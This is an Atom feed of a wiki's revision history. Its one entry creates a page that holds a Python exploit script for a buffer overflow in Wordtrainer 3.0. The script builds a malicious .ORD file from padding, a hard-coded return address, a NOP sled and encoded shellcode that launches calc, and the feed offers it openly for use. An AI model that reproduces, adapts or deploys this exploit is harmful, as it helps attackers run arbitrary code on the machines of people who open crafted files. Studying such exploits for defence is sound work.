<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Wordtrainer_3.0_.ORD%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>Wordtrainer 3.0 .ORD文件緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Wordtrainer_3.0_.ORD%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Wordtrainer_3.0_.ORD%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T19:14:32Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Wordtrainer_3.0_.ORD%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=688&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/python # #[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability #[+]Date: 12\04\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link:...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Wordtrainer_3.0_.ORD%E6%96%87%E4%BB%B6%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=688&amp;oldid=prev"/>
		<updated>2021-03-27T02:54:43Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/python # #[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability #[+]Date: 12\04\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link:...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
#&lt;br /&gt;
#[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability&lt;br /&gt;
#[+]Date: 12\04\2011&lt;br /&gt;
#[+]Author: C4SS!0 G0M3S&lt;br /&gt;
#[+]Software Link: http://www.wordtrainer.net/software/files/wt307shw_exe/wt307shw.exe&lt;br /&gt;
#[+]Version: 3.0&lt;br /&gt;
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese&lt;br /&gt;
#[+]CVE: N/A&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
from struct import pack&lt;br /&gt;
from time import sleep&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;&amp;quot;&amp;quot; &lt;br /&gt;
		Exploit Buffer Overflow Wordtrainer 3.0&lt;br /&gt;
		Created BY C4SS!0 G0M3S&lt;br /&gt;
		E-mail Louredo_@hotmail.com&lt;br /&gt;
		Site www.exploit-br.org&lt;br /&gt;
&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
buf = (&amp;quot;\x41&amp;quot; * 868)&lt;br /&gt;
buf += pack('&amp;lt;L',0x00430363)&lt;br /&gt;
buf += (&amp;quot;\x90&amp;quot; * 10)&lt;br /&gt;
buf += (&amp;quot;\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1&amp;quot; &lt;br /&gt;
&amp;quot;\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30&amp;quot; &lt;br /&gt;
&amp;quot;\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa&amp;quot; &lt;br /&gt;
&amp;quot;\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96&amp;quot; &lt;br /&gt;
&amp;quot;\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b&amp;quot; &lt;br /&gt;
&amp;quot;\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a&amp;quot; #Shellcode WinExec(&amp;quot;calc&amp;quot;,0)&lt;br /&gt;
&amp;quot;\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83&amp;quot; &lt;br /&gt;
&amp;quot;\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98&amp;quot; &lt;br /&gt;
&amp;quot;\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61&amp;quot; &lt;br /&gt;
&amp;quot;\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05&amp;quot; &lt;br /&gt;
&amp;quot;\x7f\xe8\x7b\xca&amp;quot;)&lt;br /&gt;
buf += &amp;quot;\x41&amp;quot; * (2000-len(buf))&lt;br /&gt;
head = (&amp;quot;\x47\x4C\x4F\x53\x4F\x52\x0D\x0A\x31\x0D\x0A\x0D\x0A\x20\x0D\x0A&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
head += (buf+&amp;quot;\r\n&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;[+]Creating the Exploit File...&amp;quot;&lt;br /&gt;
sleep(1)&lt;br /&gt;
FILE = open(&amp;quot;Exploit.ord&amp;quot;,&amp;quot;wb&amp;quot;)&lt;br /&gt;
FILE.write(head)&lt;br /&gt;
FILE.close()&lt;br /&gt;
print &amp;quot;[+]File Created With Success\n&amp;quot;&lt;br /&gt;
sleep(2)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>